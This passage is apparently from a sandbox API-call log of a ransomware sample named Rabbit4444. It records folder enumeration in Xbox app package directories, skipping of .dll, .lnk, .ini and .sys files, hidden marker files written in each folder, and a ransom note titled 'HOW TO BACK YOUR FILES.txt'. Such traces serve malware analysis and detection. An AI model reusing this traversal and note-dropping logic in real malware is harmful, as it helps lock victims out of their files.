(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x22) returned 1 [0062.360] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.LOG2", dwFileAttributes=0x6) returned 1 [0062.360] lstrlenW (lpString="settings.dat.LOG2") returned 17 [0062.360] lstrlenW (lpString="Rabbit4444") returned 10 [0062.360] lstrcmpiW (lpString1="s.dat.LOG2", lpString2="Rabbit4444") returned 1 [0062.360] lstrlenW (lpString=".dll") returned 4 [0062.360] lstrcmpiW (lpString1="LOG2", lpString2=".dll") returned 1 [0062.360] lstrlenW (lpString=".lnk") returned 4 [0062.361] lstrcmpiW (lpString1="LOG2", lpString2=".lnk") returned 1 [0062.361] lstrlenW (lpString=".ini") returned 4 [0062.361] lstrcmpiW (lpString1="LOG2", lpString2=".ini") returned 1 [0062.361] lstrlenW (lpString=".sys") returned 4 [0062.361] lstrcmpiW (lpString1="LOG2", lpString2=".sys") returned 1 [0062.361] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xda0ae1c0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xda0ae1c0, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xda0ae1c0, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0062.361] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0062.361] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.361] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\settings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.362] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.362] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.363] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.363] CloseHandle (hObject=0x298) returned 1 [0062.363] CloseHandle (hObject=0x27c) returned 1 [0062.363] GetCurrentThreadId () returned 0xd98 [0062.363] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0062.363] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState" [0062.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123828 | out: hHeap=0xe0000) returned 1 [0062.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0062.363] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState" [0062.363] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\" [0062.363] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0062.363] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.364] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.367] FlushFileBuffers (hFile=0x27c) returned 1 [0062.368] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.368] CloseHandle (hObject=0x27c) returned 1 [0062.369] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState") returned 94 [0062.369] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.369] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9130c033, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2240caa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee7f7283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0062.369] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.369] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.369] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.369] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.369] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9130c033, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2240caa, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee7f7283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.369] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.369] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.369] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.369] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.369] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.369] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee7f7283, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee7f7283, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee7f7283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.369] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.369] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.370] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee7f7283, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee7f7283, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee7f7283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.370] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0062.370] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.370] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.370] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.371] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.371] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.371] CloseHandle (hObject=0x298) returned 1 [0062.371] CloseHandle (hObject=0x27c) returned 1 [0062.371] GetCurrentThreadId () returned 0xd98 [0062.371] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220a8 [0062.371] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState" [0062.371] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123760 | out: hHeap=0xe0000) returned 1 [0062.371] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220a0 | out: hHeap=0xe0000) returned 1 [0062.371] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState" [0062.371] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\" [0062.371] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0062.371] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.372] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.375] FlushFileBuffers (hFile=0x27c) returned 1 [0062.375] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.376] CloseHandle (hObject=0x27c) returned 1 [0062.376] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState") returned 92 [0062.376] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.376] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91299917, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2240475, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee7f7283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0062.376] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.376] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.376] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.377] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.377] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91299917, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd2240475, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee7f7283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.377] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.377] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.377] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.377] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.377] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.377] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee7f7283, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee7f7283, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee7f7283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.377] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.377] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.377] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee7f7283, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee7f7283, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee7f7283, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.377] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0062.377] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.377] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.378] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.378] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.378] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.378] CloseHandle (hObject=0x298) returned 1 [0062.379] CloseHandle (hObject=0x27c) returned 1 [0062.379] GetCurrentThreadId () returned 0xd98 [0062.379] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0062.379] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache" [0062.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e380 | out: hHeap=0xe0000) returned 1 [0062.379] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 [0062.379] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache" [0062.379] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\" [0062.379] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0062.379] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.380] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.382] FlushFileBuffers (hFile=0x27c) returned 1 [0062.383] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.383] CloseHandle (hObject=0x27c) returned 1 [0062.384] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache") returned 92 [0062.384] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.384] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9146357c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223fba5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee81d4ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0062.384] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.384] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.384] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.384] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.384] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9146357c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd223fba5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee81d4ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.384] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.384] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.384] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.384] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.384] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.385] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee81d4ec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee81d4ec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee81d4ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.385] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.385] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.385] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee81d4ec, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee81d4ec, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee81d4ec, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.385] FindClose (in: hFindFile=0x1028d0 | out: hFindFile=0x1028d0) returned 1 [0062.385] lstrcpyW (in: lpString1=0x130ebf2, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.385] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 